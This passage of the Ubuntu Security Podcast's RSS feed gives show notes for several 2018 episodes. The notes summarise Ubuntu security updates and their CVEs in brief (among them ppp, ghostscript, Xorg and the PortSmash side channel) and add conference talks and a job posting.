<li><a href="https://ubuntu.com/security/CVE-2018-15863">CVE-2018-15863</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15862">CVE-2018-15862</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15861">CVE-2018-15861</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15859">CVE-2018-15859</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15858">CVE-2018-15858</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15857">CVE-2018-15857</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15855">CVE-2018-15855</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15854">CVE-2018-15854</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15853">CVE-2018-15853</a></li>
</ul>
</li>
<li>Episode 7 for Trusty and Xenial</li>
<li>Some common CVEs, some new ones specific to Bionic version</li>
</ul>
<h3 id="usn-3810-1-ppp-vulnerability">[<a href="https://usn.ubuntu.com/3810-1/">USN-3810-1</a>] ppp vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11574">CVE-2018-11574</a></li>
</ul>
</li>
<li>Ubuntu specific change to pppd to add support for EAP-TLS authentication
<ul>
<li>Could be triggered on both peer or server side</li>
<li>Lack of input validation coupled with an integer overflow lead to crash and possible authentication bypass</li>
<li>Leads to memcpy() with a negative length value (and hence very large unsigned value)</li>
<li>Theoretically possible to overwrite other data structures related to server state and therefore bypass authentication</li>
</ul>
</li>
</ul>
<h3 id="usn-3811-1-spamassassin-vulnerabilities">[<a href="https://usn.ubuntu.com/3811-1/">USN-3811-1</a>] SpamAssassin vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11781">CVE-2018-11781</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11780">CVE-2018-11780</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15705">CVE-2017-15705</a></li>
</ul>
</li>
<li>Updated to latest stable version of spamassassin (3.4.2)
<ul>
<li>So all supported Ubuntu releases now have 3.4.2</li>
</ul>
</li>
<li>Local user code injection via meta rule syntax</li>
<li>RCE via PDFInfo plugin</li>
<li>Failure to handle unclosed HTML tags in emails leading to DoS</li>
</ul>
<h3 id="usn-3812-1-nginx-vulnerabilities">[<a href="https://usn.ubuntu.com/3812-1/">USN-3812-1</a>] nginx vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16845">CVE-2018-16845</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16844">CVE-2018-16844</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16843">CVE-2018-16843</a></li>
</ul>
</li>
<li>DoS due to memory usage in HTTP/2 handling</li>
<li>DoS due to excessive CPU usage in HTTP/2 handling</li>
<li>When processing a specially crafted mp4 file, could lead to infinite loop
<ul>
<li>This module is in the nginx-extras package</li>
</ul>
</li>
</ul>
<h3 id="usn-3813-1-pyopenssl-vulnerabilities">[<a href="https://usn.ubuntu.com/3813-1/">USN-3813-1</a>] pyOpenSSL vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000808">CVE-2018-1000808</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000807">CVE-2018-1000807</a></li>
</ul>
</li>
<li>DoS via crash in handling of X509 certificates</li>
<li>UAF in handling of X509 certificates</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="portsmash-new-intel-side-channel-vulnerability-or-expected-behaviour-for-smt"><a href="https://eprint.iacr.org/2018/1060">PortSmash</a> - New Intel side-channel vulnerability or expected behaviour for SMT?</h3>
<ul>
<li><a href="https://ubuntu.com/security/2018/CVE-2018-5407.html">CVE-2018-5407</a> assigned to OpenSSL but described as a side-channel in Intel SMT / Hyper-Threading
<ul>
<li><a href="https://www.openwall.com/lists/oss-security/2018/11/01/4">https://www.openwall.com/lists/oss-security/2018/11/01/4</a></li>
<li>Affects OpenSSL &lt;= 1.1.0h</li>
</ul>
</li>
<li><a href="https://www.openwall.com/lists/oss-security/2015/08/12/8">Originally suggested as a possible side-channel in 2015</a></li>
<li>Due to sharing of execution engines in SMT
<ul>
<li>Two processes across shared hyper-threads, contend for execution units across same ports</li>
<li>Meaure port contention delay -&gt; side channel to recover ECDSA private key of server running in other process</li>
</ul>
</li>
<li>So crypto code needs not only to be constant-time, but also secret-independent execution-flow
<ul>
<li>ie. execute same instruction sequence regardless of secret</li>
<li>all code and data addresses are assumed public</li>
</ul>
</li>
<li>Or disable HT / learn to schedule trust domains across different hyper-threads (gang-scheduling)</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="preview-of-next-episode">Preview of Next Episode</h2>
<h3 id="upcoming-fixes">Upcoming fixes</h3>
<ul>
<li>libmspack, systemd, gettext</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E011.mp3" length="12529292" type="audio/mpeg" /><itunes:duration>13:03</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 10
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-10/</link>
          <pubDate>Mon, 05 Nov 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E010.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 10</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.</itunes:summary>
        <description>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.</description>
        <googleplay:description>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>17 unique CVEs addressed</p>
<h3 id="usn-3799-2-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/3799-2/">USN-3799-2</a>] MySQL vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3282">CVE-2018-3282</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3174">CVE-2018-3174</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3133">CVE-2018-3133</a></li>
</ul>
</li>
<li>Ubuntu 12.04 Precise ESM update for 3 CVEs fixed in usual supported releases (covered in Episode 9)</li>
</ul>
<h3 id="usn-3803-1-ghostscript-vulnerabilities">[<a href="https://usn.ubuntu.com/3803-1/">USN-3803-1</a>] Ghostscript vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18284">CVE-2018-18284</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18073">CVE-2018-18073</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17961">CVE-2018-17961</a></li>
</ul>
</li>
<li>More ghostscript vulnerabilities! (others recent ones covered in Episodes 5 and 7)</li>
<li>2 brand new sandbox (-dSAFER) bypasses by Tavis Ormandy</li>
<li>Third one is due to an incomplete fix for <a href="https://ubuntu.com/security/CVE-2018-17183">CVE-2018-17183</a></li>
</ul>
<h3 id="usn-3804-1-openjdk-vulnerabilities">[<a href="https://usn.ubuntu.com/3804-1/">USN-3804-1</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3214">CVE-2018-3214</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3183">CVE-2018-3183</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3180">CVE-2018-3180</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3169">CVE-2018-3169</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3150">CVE-2018-3150</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3149">CVE-2018-3149</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3139">CVE-2018-3139</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3136">CVE-2018-3136</a></li>
</ul>
</li>
<li>New OpenJDK release covering multiple vulnerabilities including:
<ul>
<li>Insufficient checking of signatures in manifest elements could allow untrusted Java application to escape sandbox</li>
<li>Insufficient checking of all JAR attributes could allow untrusted Java application to escape sandbox</li>
<li>Failure to clear HTTP header elements could result in exposure of sensitive info when follow redirect to another host</li>
<li>Possible arbitrary code execution due to failure to enforce system security properties</li>
</ul>
</li>
</ul>
<h3 id="usn-3805-1-usn-3805-2-curl-vulnerabilities">[<a href="https://usn.ubuntu.com/3805-1/">USN-3805-1</a>, USN-3805-2] curl vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16842">CVE-2018-16842</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16840">CVE-2018-16840</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16839">CVE-2018-16839</a></li>
</ul>
</li>
<li>1 CVE addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16839">CVE-2018-16839</a></li>
</ul>
</li>
<li>Buffer overflow in SASL authentication (very similar to <a href="https://ubuntu.com/security/CVE-2018-14618">CVE-2018-14618</a> from Episode 5)</li>
<li>UAF when closing handle (DoS / crash)</li>
<li>Out-of-bounds read when using curl to print show error messages via command-line
<ul>
<li>This is fixed for Precise ESM too</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-security-summit-europe--lss-eu">Linux Security Summit Europe (LSS-EU)</h3>
<ul>
<li>2 presentations by Canonical engineers</li>
<li><a href="https://events.linuxfoundation.org/events/linux-security-summit-europe-2018/">https://events.linuxfoundation.org/events/linux-security-summit-europe-2018/</a></li>
</ul>
<h4 id="overview-and-recent-developments-namespaces-and-capabilities">Overview and Recent Developments: Namespaces and Capabilities</h4>
<ul>
<li>Christian Brauner (Kernel engineer focussing on lxd at Canonical)</li>
<li>Namespaces and Capabilities are building blocks for containers</li>
<li>Summarises recent enhancements to various namespaces etc</li>
<li>Future highlights: seccomp trap to userspace, LSM stacking, CAP_SYS_ADMIN split?</li>
<li>Slides: <a href="https://events.linuxfoundation.org/wp-content/uploads/2017/12/2018-LSS-Europe-Edinburgh-Namespaces-and-Capabilities_Christian-Brauner.pdf">https://events.linuxfoundation.org/wp-content/uploads/2017/12/2018-LSS-Europe-Edinburgh-Namespaces-and-Capabilities_Christian-Brauner.pdf</a></li>
<li>Video: <a href="https://www.youtube.com/watch?v=-PZNF8XDNn8&amp;list=PLbzoR-pLrL6oa4x78bHssxmGAw_ns1Tm2&amp;index=8">https://www.youtube.com/watch?v=-PZNF8XDNn8&amp;list=PLbzoR-pLrL6oa4x78bHssxmGAw_ns1Tm2&amp;index=8</a></li>
</ul>
<h4 id="overview-and-recent-developments-apparmor">Overview and Recent Developments: AppArmor</h4>
<ul>
<li>John Johansen (Ubuntu Security team, AppArmor (kernel) maintainer)</li>
<li>Summarises some of the history, use of and the latest developments in AppArmor</li>
<li>Future highlights: Allow user / apps to load policy, delegation, pam_apparmor</li>
<li>Slides: <a href="https://events.linuxfoundation.org/wp-content/uploads/2017/12/lss-eu-apparmor-overview-2018.pdf">https://events.linuxfoundation.org/wp-content/uploads/2017/12/lss-eu-apparmor-overview-2018.pdf</a></li>
<li>Video: <a href="https://www.youtube.com/watch?v=3MkU_Z-fClE&amp;list=PLbzoR-pLrL6oa4x78bHssxmGAw_ns1Tm2&amp;index=15">https://www.youtube.com/watch?v=3MkU_Z-fClE&amp;list=PLbzoR-pLrL6oa4x78bHssxmGAw_ns1Tm2&amp;index=15</a></li>
</ul>
<h3 id="blog-posts">Blog posts</h3>
<h4 id="a-guide-to-snap-permissions-and-interfaces">A guide to snap permissions and interfaces</h4>
<ul>
<li><a href="https://blog.ubuntu.com/2018/11/01/a-guide-to-snap-permissions-and-interfaces">https://blog.ubuntu.com/2018/11/01/a-guide-to-snap-permissions-and-interfaces</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E010.mp3" length="9041423" type="audio/mpeg" /><itunes:duration>09:25</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 9
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-9/</link>
          <pubDate>Tue, 30 Oct 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E009.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 9</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability ([CVE-2018-14665](https://ubuntu.com/security/CVE-2018-14665)), plus Cosmic is now...
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability ([CVE-2018-14665](https://ubuntu.com/security/CVE-2018-14665)), plus Cosmic is now officially supported by the Security Team.</itunes:summary>
        <description>This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability ([CVE-2018-14665](https://ubuntu.com/security/CVE-2018-14665)), plus Cosmic is now officially supported by the Security Team.</description>
        <googleplay:description>This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability ([CVE-2018-14665](https://ubuntu.com/security/CVE-2018-14665)), plus Cosmic is now officially supported by the Security Team.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability (<a href="https://ubuntu.com/security/CVE-2018-14665">CVE-2018-14665</a>), plus Cosmic is now officially supported by the Security Team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>61 unique CVEs addressed</p>
<h3 id="usn-3790-2-requests-vulnerability">[<a href="https://usn.ubuntu.com/3790-2/">USN-3790-2</a>] Requests vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18074">CVE-2018-18074</a></li>
</ul>
</li>
<li>Cosmic is now officially released and so is officially supported by the Security Team</li>
<li>This is the same vulnerability which we covered in Episode 8 for Trusty, Xenial, Bionic now fixed for Cosmic</li>
</ul>
<h3 id="usn-3795-2-libssh-vulnerability">[<a href="https://usn.ubuntu.com/3795-2/">USN-3795-2</a>] libssh vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10933">CVE-2018-10933</a></li>
</ul>
</li>
<li>This is the same vulnerability which we covered in Episode 8 for Trusty, Xenial, Bionic now fixed for Cosmic</li>
</ul>
<h3 id="usn-3792-3-net-snmp-vulnerability">[<a href="https://usn.ubuntu.com/3792-3/">USN-3792-3</a>] Net-SNMP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18065">CVE-2018-18065</a></li>
</ul>
</li>
<li>This is the same vulnerability which we covered in Episode 8 for Trusty, Xenial &amp; Bionic now fixed for Cosmic</li>
</ul>
<h3 id="usn-3796-3-paramiko-vulnerability">[<a href="https://usn.ubuntu.com/3796-3/">USN-3796-3</a>] Paramiko vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000805">CVE-2018-1000805</a></li>
</ul>
</li>
<li>This is the same vulnerability which we covered in Episode 8 for Trusty, Xenial &amp; Bionic now fixed for Cosmic</li>
</ul>
<h3 id="usn-3788-2-tex-live-bin-vulnerability">[<a href="https://usn.ubuntu.com/3788-2/">USN-3788-2</a>] Tex Live-bin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17407">CVE-2018-17407</a></li>
</ul>
</li>
<li>This is the same vulnerability which we covered in Episode 7 for Trusty, Xenial &amp; Bionic now fixed for Cosmic</li>
</ul>
<h3 id="usn-3797-1-usn-3797-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3797-1/">USN-3797-1</a>, USN-3797-2] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial and Trusty for the Xenial HWE kernel for Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10938">CVE-2018-10938</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9363">CVE-2018-9363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16658">CVE-2018-16658</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14734">CVE-2018-14734</a></li>
</ul>
</li>
<li>Includes:
<ul>
<li>UAF in Infiniband -&gt; DoS via crash</li>
<li>Integer overflow in CDROM -&gt; info disclosure of kernel memory</li>
<li>Integer overflow in bluetooth HID -&gt; buffer overflow -&gt; DoS / possible arbitrary code execution</li>
<li>Remotely triggerable infinite loop in labelled network handler (CIPSO)
<ul>
<li>CIPSO used by SELinux / SMACK not AppArmor so unlikely Ubuntu users affected</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3798-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3798-1/">USN-3798-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Trusty and Precise ESM (for the Trusty HWE kernel for Precise ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9518">CVE-2018-9518</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7566">CVE-2018-7566</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000004">CVE-2018-1000004</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18216">CVE-2017-18216</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15299">CVE-2017-15299</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-0794">CVE-2017-0794</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7913">CVE-2016-7913</a></li>
<li><a href="https://ubuntu.com/security/CVE-2015-8539">CVE-2015-8539</a></li>
</ul>
</li>
<li>Includes:
<ul>
<li>Local DoS / code exec via insertion of an already existing key into kernel keyring</li>
<li>UAF in XCeive driver, local DoS / code exec (crash)</li>
<li>Race condition in generic SCSI -&gt; Local DoS (crash) / code exec</li>
<li>NULL ptr dereference in ocfs2 -&gt; Local DoS (crash)</li>
<li>Race condition in ALSA handling of ioctls -&gt; Local DoS via deadlock</li>
<li>Race condition in ALSA -&gt; UAF / out of bounds read -&gt; Local DoS (crash) / code exec</li>
<li>Buffer overflow in NFC LLCP impl -&gt; remote DoS / code exec</li>
</ul>
</li>
</ul>
<h3 id="usn-3777-3-linux-kernel--azure--vulnerabilities">[<a href="https://usn.ubuntu.com/3777-3/">USN-3777-3</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6555">CVE-2018-6555</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6554">CVE-2018-6554</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3639">CVE-2018-3639</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14633">CVE-2018-14633</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5715">CVE-2017-5715</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15572">CVE-2018-15572</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15594">CVE-2018-15594</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17182">CVE-2018-17182</a></li>
</ul>
</li>
<li>Corresponding fixes for Azure Cloud specific kernel as covered in Episode 7
for standard Bionic kernel</li>
</ul>
<h3 id="usn-3799-1-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/3799-1/">USN-3799-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>21 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3284">CVE-2018-3284</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3283">CVE-2018-3283</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3282">CVE-2018-3282</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3278">CVE-2018-3278</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3277">CVE-2018-3277</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3276">CVE-2018-3276</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3251">CVE-2018-3251</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3247">CVE-2018-3247</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3200">CVE-2018-3200</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3187">CVE-2018-3187</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3185">CVE-2018-3185</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3174">CVE-2018-3174</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3173">CVE-2018-3173</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3171">CVE-2018-3171</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3162">CVE-2018-3162</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3161">CVE-2018-3161</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3156">CVE-2018-3156</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3155">CVE-2018-3155</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3144">CVE-2018-3144</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3143">CVE-2018-3143</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3133">CVE-2018-3133</a></li>
</ul>
</li>
<li>New upstream versions of MySQL for all supported releases to fix multiple
vulnerabilities, add features and possible incompatible changes</li>
<li>Trusty: 5.5.62</li>
<li>Xenial, Bionic &amp; Cosmic: 5.7.24</li>
</ul>
<h3 id="usn-3800-1-audiofile-vulnerabilities">[<a href="https://usn.ubuntu.com/3800-1/">USN-3800-1</a>] audiofile vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17095">CVE-2018-17095</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13440">CVE-2018-13440</a></li>
</ul>
</li>
<li>DoS (crash) and possible code execution via specially crafted audio files</li>
</ul>
<h3 id="usn-3801-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3801-1/">USN-3801-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12397">CVE-2018-12397</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12396">CVE-2018-12396</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12395">CVE-2018-12395</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12403">CVE-2018-12403</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12402">CVE-2018-12402</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12401">CVE-2018-12401</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12399">CVE-2018-12399</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12398">CVE-2018-12398</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12393">CVE-2018-12393</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12392">CVE-2018-12392</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12390">CVE-2018-12390</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12388">CVE-2018-12388</a></li>
</ul>
</li>
<li>Firefox 63</li>
<li>Includes fixes for a range of issues, most severe is possible RCE</li>
<li>Also fixes for WebExtensions in Firefox - to exploit need to install a
malicious extension - then could privilege escalation or local code execution</li>
</ul>
<h3 id="usn-3802-1-x-dot-org-x-server-vulnerability">[<a href="https://usn.ubuntu.com/3802-1/">USN-3802-1</a>] X.Org X server vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14665">CVE-2018-14665</a></li>
</ul>
</li>
<li>Incorrect permissions check for 2 command-line arguments (-modulepath and -logfile)</li>
<li>On <strong>some</strong> platforms (not Ubuntu) Xorg itself is setuid</li>
<li>Can then use these command-line options to overwrite arbitrary files etc -&gt; privilege escalation to root via say overwrite of /etc/shadow</li>
<li>Generated a lot of press - <strong>BUT</strong> missed the distinction that Xorg is not really setuid on Ubuntu</li>
<li>We use Xorg.wrap as setuid to first run and drop permissions if using KMS driver
<ul>
<li>This is the case for the vast majority of drivers, and for almost all free drivers</li>
<li>So most Ubuntu users unaffected by this vulnerability</li>
</ul>
</li>
<li>Special Friday release :)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E009.mp3" length="11511142" type="audio/mpeg" /><itunes:duration>11:59</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 8
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-8/</link>
          <pubDate>Mon, 22 Oct 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E008.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 8</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.</itunes:summary>
        <description>This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.</description>
